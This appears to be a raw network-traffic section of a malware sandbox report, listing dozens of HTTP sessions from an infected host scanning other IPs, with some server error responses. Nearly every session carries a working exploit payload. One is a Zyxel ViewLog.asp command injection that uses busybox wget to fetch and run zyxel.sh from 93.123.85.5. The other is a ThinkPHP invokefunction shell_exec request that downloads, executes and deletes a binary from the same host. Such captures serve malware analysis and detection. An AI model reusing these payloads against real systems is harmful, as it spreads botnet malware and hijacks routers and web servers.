                                                              790192.168.2.234719231.200.246.218080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:05.056833982 CET15536OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:05.370301962 CET15550INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 21:20:05 GMT
                                                              Server: Apache/2.4.29 (Ubuntu) mod_fcgid/2.3.9 OpenSSL/1.1.1
                                                              Content-Length: 226
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              791192.168.2.233807031.184.228.98080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:05.074631929 CET15539OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:05.405307055 CET15552INHTTP/1.1 400 Bad Request
                                                              Server: nginx
                                                              Date: Mon, 13 Nov 2023 21:20:05 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 264
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 54 68 65 20 70 6c 61 69 6e 20 48 54 54 50 20 72 65 71 75 65 73 74 20 77 61 73 20 73 65 6e 74 20 74 6f 20 48 54 54 50 53 20 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 63 65 6e 74 65 72 3e 54 68 65 20 70 6c 61 69 6e 20 48 54 54 50 20 72 65 71 75 65 73 74 20 77 61 73 20 73 65 6e 74 20 74 6f 20 48 54 54 50 53 20 70 6f 72 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 The plain HTTP request was sent to HTTPS port</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><center>The plain HTTP request was sent to HTTPS port</center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              792192.168.2.235965631.43.239.178080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:05.078066111 CET15540OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              793192.168.2.235647085.247.24.2348080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:05.083004951 CET15540OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              794192.168.2.233618894.121.148.1378080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:05.087096930 CET15541OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              795192.168.2.234332495.100.87.11480
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:05.150374889 CET15542OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:05.441107035 CET15556INHTTP/1.0 400 Bad Request
                                                              Server: AkamaiGHost
                                                              Mime-Version: 1.0
                                                              Content-Type: text/html
                                                              Content-Length: 258
                                                              Expires: Mon, 13 Nov 2023 21:20:05 GMT
                                                              Date: Mon, 13 Nov 2023 21:20:05 GMT
                                                              Connection: close
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 36 65 35 37 36 34 35 66 26 23 34 36 3b 31 36 39 39 39 31 30 34 30 35 26 23 34 36 3b 31 66 34 62 32 62 65 66 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;6e57645f&#46;1699910405&#46;1f4b2bef</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              796192.168.2.233844695.182.159.2280
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:05.168353081 CET15543OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:05.496686935 CET15560INHTTP/1.1 400 Bad Request
                                                              Content-Type: text/html; charset=us-ascii
                                                              Server: Microsoft-HTTPAPI/2.0
                                                              Date: Mon, 13 Nov 2023 21:20:05 GMT
                                                              Connection: close
                                                              Content-Length: 311
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              797192.168.2.234410895.86.73.14080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:05.214436054 CET15545OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              798192.168.2.236088895.215.242.9980
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:05.217076063 CET15546OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:05.575706959 CET15563INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 21:20:05 GMT
                                                              Server: Apache/2.2.15 (CentOS)
                                                              Content-Length: 226
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              799192.168.2.235753862.49.135.1858080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:05.356333971 CET15548OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:05.664587975 CET15564INHTTP/1.1 302 Moved Temporarily
                                                              Server: nginx
                                                              Date: Mon, 13 Nov 2023 21:20:05 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 138
                                                              Connection: keep-alive
                                                              Location: http://vodafone.broadband/no-internet-connection-intercept.lp?url=192.168.0.14:80&#47;cgi-bin&#47;ViewLog.asp
                                                              X-Frame-Options: SAMEORIGIN
                                                              Cache-Control: public, max-age=31536000
                                                              X-Content-Type-Options: nosniff
                                                              X-XSS-Protection: 1
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              8192.168.2.233634695.110.226.1898080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:01.359987020 CET434OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              80192.168.2.233990894.121.102.2418080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:21.092108011 CET2702OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              800192.168.2.234343431.136.183.1048080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:05.401043892 CET15551OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:06.404926062 CET15683OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:08.388668060 CET15921OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:12.356194973 CET16420OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:20.291069984 CET17420OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:36.161056995 CET19384OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:21:08.668759108 CET20703OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              801192.168.2.234115094.64.8.228080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:05.417315006 CET15554OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:05.776231050 CET15651INHTTP/1.1 404 Not Found
                                                              Date: Fri, 27 Mar 1970 17:26:49 GMT
                                                              Server: DNVRS-Webs
                                                              Cache-Control: no-cache
                                                              Content-Length: 166
                                                              Content-Type: text/html
                                                              Connection: keep-alive
                                                              Keep-Alive: timeout=60, max=99
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              802192.168.2.234904294.120.51.1778080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:05.417510986 CET15555OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
